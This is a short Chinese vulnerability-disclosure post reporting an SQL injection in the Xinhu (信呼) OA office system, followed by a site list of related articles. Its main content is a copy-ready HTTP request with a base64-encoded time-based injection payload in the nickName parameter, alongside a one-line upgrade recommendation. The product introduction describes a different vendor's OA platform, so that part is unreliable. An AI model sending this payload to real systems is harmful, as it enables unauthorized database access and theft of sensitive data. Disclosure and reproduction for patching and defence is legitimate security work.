漏洞披露-信呼-OA

无问社区2024-09-10 19:55

更多网安漏洞复现,可前往无问社区查看http://wwlib.cn/index.php/artread/artid/16564.html

0x01 产品简介

泛微数字化运营管理平台OA为组织提供从"可信数字身份、电子化流程审批、个性化岗位信息门户、 知识文档管理、电子化签署到内外协同的业务管理"

0x02 漏洞概述

信呼OA办公系统存在SQL注入漏洞,攻击者可利用该漏洞获取数据库敏感信息。

建议升级到最新版本已修复

0x03 复现环境

payload:

复制代码 
GET /index.php?m=openmodhetong|openapi&d=task&a=data&ajaxbool=0&nickName=MScgYW5kIHNsZWVwKDUpIw== HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
相关推荐
Gauss松鼠会18 小时前
【openGauss】openGauss 中一个数据库可以被多个用户访问
数据库·sql·性能优化·database·opengauss
大方子19 小时前
【PolarCTF】bluetooth test
网络安全·polarctf
LuminescenceJ19 小时前
GoEdge 开源CDN 架构设计与工作原理分析
分布式·后端·网络协议·网络安全·rpc·开源·信息与通信
weixin_4365250720 小时前
若依多租户版: 页面新增菜单, 执行菜单SQL
前端·数据库·sql
大方子1 天前
【PolarCTF】$$
网络安全·polarctf
知识分享小能手1 天前
Oracle 19c入门学习教程,从入门到精通,Oracle优化SQL语句 — 语法知识点与使用方法详解(16)
sql·学习·oracle
大方子1 天前
【PolarCTF】LSB
网络安全·polarctf
TimberWill1 天前
常用sql【pgsql】——建表相关
数据库·sql
浩浩测试一下1 天前
应急响应之 洪水 Floods attack ==== DDOS
安全·web安全·网络安全·系统安全·ddos·安全架构
麦聪聊数据1 天前
LiveOps事故零容忍:游戏行业数据库的细粒度权限管控与审计实践
运维·数据库·后端·sql
热门推荐
01GitHub 镜像站点02Clawdbot 中文汉化版 接入微信、飞书03OpenCode 入门教程:介绍 · 安装 · 配置第三方 API (如 Claude)04一种新的LCA算法052026数学建模美赛题目特点与选题建议,常用四大模型汇总06Claude Code Skills 实用使用手册07零门槛部署本地 AI 助手:Clawdbot/Meltbot 部署深度保姆级教程08【网络安全测试】Burp Suite工具使用说明、配置及常见问题(有关必回)09在Trae中使用Pencil MCP10如何做一个网站?